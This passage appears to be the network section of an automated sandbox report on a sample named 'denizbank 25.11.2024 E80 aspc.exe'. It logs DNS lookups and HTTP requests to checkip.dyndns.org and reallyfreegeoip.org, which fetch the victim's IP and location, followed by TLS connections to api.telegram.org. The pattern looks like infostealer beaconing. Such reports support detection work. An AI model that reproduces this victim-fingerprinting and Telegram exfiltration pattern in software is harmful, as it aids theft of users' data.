Nov 25, 2024 11:46:03.819333076 CET	443	50123	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:03.822061062 CET	50123	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:05.617702961 CET	50123	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:05.617794037 CET	443	50123	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:05.617850065 CET	50123	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:05.621781111 CET	50125	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:05.621829033 CET	443	50125	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:05.621893883 CET	50125	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:05.622294903 CET	50125	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:05.622311115 CET	443	50125	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:07.060998917 CET	443	50125	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:07.061109066 CET	50125	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:07.063064098 CET	50125	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:07.063074112 CET	443	50125	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:07.063328981 CET	443	50125	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:07.235584021 CET	50125	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:08.873091936 CET	50125	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:08.873198032 CET	443	50125	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:08.873250961 CET	50125	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:08.877113104 CET	50127	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:08.877146959 CET	443	50127	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:08.877206087 CET	50127	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:08.877473116 CET	50127	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:08.877484083 CET	443	50127	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:10.669843912 CET	443	50127	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:10.669917107 CET	50127	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:10.672106028 CET	50127	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:10.672115088 CET	443	50127	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:10.672441959 CET	443	50127	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:10.789876938 CET	50127	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:13.559225082 CET	50127	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:13.559381008 CET	443	50127	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:13.559464931 CET	50127	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:13.561872005 CET	50129	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:13.561904907 CET	443	50129	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:13.561975956 CET	50129	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:13.562326908 CET	50129	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:13.562344074 CET	443	50129	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:15.020104885 CET	443	50129	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:15.020179987 CET	50129	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:15.250866890 CET	50129	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:15.250889063 CET	443	50129	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:15.251211882 CET	443	50129	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:15.255017042 CET	50129	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:15.299321890 CET	443	50129	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:15.299366951 CET	50129	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:15.299372911 CET	443	50129	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:15.838951111 CET	443	50129	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:15.839178085 CET	443	50129	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:15.839324951 CET	50129	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:15.839654922 CET	50129	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:15.840889931 CET	50130	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:15.840919971 CET	443	50130	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:15.840998888 CET	50130	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:15.841188908 CET	50130	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:46:15.841198921 CET	443	50130	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:17.261578083 CET	443	50130	149.154.167.220	192.168.2.4
Nov 25, 2024 11:46:17.313653946 CET	50130	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 11:42:10.471815109 CET	62180	53	192.168.2.4	1.1.1.1
Nov 25, 2024 11:42:10.609684944 CET	53	62180	1.1.1.1	192.168.2.4
Nov 25, 2024 11:42:12.584419966 CET	58502	53	192.168.2.4	1.1.1.1
Nov 25, 2024 11:42:12.824534893 CET	53	58502	1.1.1.1	192.168.2.4
Nov 25, 2024 11:42:37.947957993 CET	62157	53	192.168.2.4	1.1.1.1
Nov 25, 2024 11:42:38.085824966 CET	53	62157	1.1.1.1	192.168.2.4
Nov 25, 2024 11:45:19.740525961 CET	56320	53	192.168.2.4	1.1.1.1
Nov 25, 2024 11:45:19.878680944 CET	53	56320	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 11:42:10.471815109 CET	192.168.2.4	1.1.1.1	0xa40d	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:42:12.584419966 CET	192.168.2.4	1.1.1.1	0x82b7	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:42:37.947957993 CET	192.168.2.4	1.1.1.1	0xf5	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:45:19.740525961 CET	192.168.2.4	1.1.1.1	0x8d28	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 11:42:10.609684944 CET	1.1.1.1	192.168.2.4	0xa40d	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 11:42:10.609684944 CET	1.1.1.1	192.168.2.4	0xa40d	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:42:10.609684944 CET	1.1.1.1	192.168.2.4	0xa40d	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:42:10.609684944 CET	1.1.1.1	192.168.2.4	0xa40d	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:42:10.609684944 CET	1.1.1.1	192.168.2.4	0xa40d	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:42:10.609684944 CET	1.1.1.1	192.168.2.4	0xa40d	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:42:12.824534893 CET	1.1.1.1	192.168.2.4	0x82b7	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:42:12.824534893 CET	1.1.1.1	192.168.2.4	0x82b7	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:42:25.167440891 CET	1.1.1.1	192.168.2.4	0x90f0	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:42:25.167440891 CET	1.1.1.1	192.168.2.4	0x90f0	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:42:38.085824966 CET	1.1.1.1	192.168.2.4	0xf5	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:45:19.878680944 CET	1.1.1.1	192.168.2.4	0x8d28	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:45:37.179887056 CET	1.1.1.1	192.168.2.4	0x8b3f	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:45:37.179887056 CET	1.1.1.1	192.168.2.4	0x8b3f	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	193.122.130.0	80	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 11:42:10.735654116 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 11:42:12.060579062 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bb6684fa113e418eb6af6e9a2586bc06 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 11:42:12.067420006 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 11:42:12.408212900 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1f266e823de1cd7c4ca293b33dffbefd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 11:42:14.569813967 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 11:42:14.907397032 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 204b31b78e13f1a6eba7df594ed901d9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	193.122.130.0	80	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 11:42:16.692667007 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 11:42:18.160442114 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f66f38ed36044d89ba5ca337e068579e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	193.122.130.0	80	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 11:42:20.056668043 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 11:42:21.171308994 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b3dd03dd5bc319cb5eefc6cb132ef077 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	193.122.130.0	80	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 11:42:23.070769072 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 11:42:24.165915012 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d901a5f17e4cf32dbc2a1785d3d9bfc0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	193.122.130.0	80	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 11:42:26.013082981 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 11:42:27.110678911 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 99acea8b265f3d8740d2662a55e45535 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49750	193.122.130.0	80	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 11:42:29.002105951 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 11:42:30.193272114 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 296269745b7a86517920d57bd8179b3f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49754	193.122.130.0	80	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 11:42:32.031975031 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 11:42:33.173333883 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:33 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 50ee81b523d7f7b668111efc09be5c9d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49756	193.122.130.0	80	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 11:42:35.121562004 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 11:42:36.263787031 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:36 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: eb2b7d22304f44d261eb38c631656b67 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	104.21.67.152	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:42:14 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 10:42:14 UTC	849	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:14 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 495243 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vPlHuzgH2iWEaxw177UANW6QIL6CDxTBkDl8W0tf9HxasFwxwaFxYxJV70LKkk3o2nd5mObtBwPo3poaAB4oYDY%2BQdfKqwKJxuEvNePQQoAdomKua2D2rm6uW6%2FQAGBcPJRfP3xE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8107e7edd47288-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1931&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1503604&cwnd=243&unsent_bytes=0&cid=a141b4a1f09906bd&ts=460&x=0"
2024-11-25 10:42:14 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	104.21.67.152	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:42:16 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 10:42:16 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:16 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 495245 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=imgU6XkP22%2FtPRWKleIJQqTC8fZ7Vqvl%2BA%2B089Rcdtcs%2BJOyVS3jCDIth7denKrH%2FXHo8Hpf3gjvf%2Blx5%2B2ECvHzpKDG8%2F9Sg3Xn8MrURtiEF9UHkeOeHfOKRhxp0WiceDx5fFjZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8107f47d6d4364-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1762&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1622222&cwnd=206&unsent_bytes=0&cid=46eadc6203f41b98&ts=450&x=0"
2024-11-25 10:42:16 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	104.21.67.152	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:42:19 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 10:42:19 UTC	849	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:42:19 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 495248 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6iupMOgJ8xsjUI2nJRjWt%2FM%2FWbDexdpbNTeaMnSn2lZ358EOrt2NLU6sqC9WKI7CB5KcEH3BNwdneqYRlAK9w8TIWg76tckM9qwV5fTr4XywhIiTQoMQPw20AGkJSFCXilW2GUaL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8108097c9580d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1680&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1648785&cwnd=230&unsent_bytes=0&cid=dcd07bca70ef8d18&ts=469&x=0"
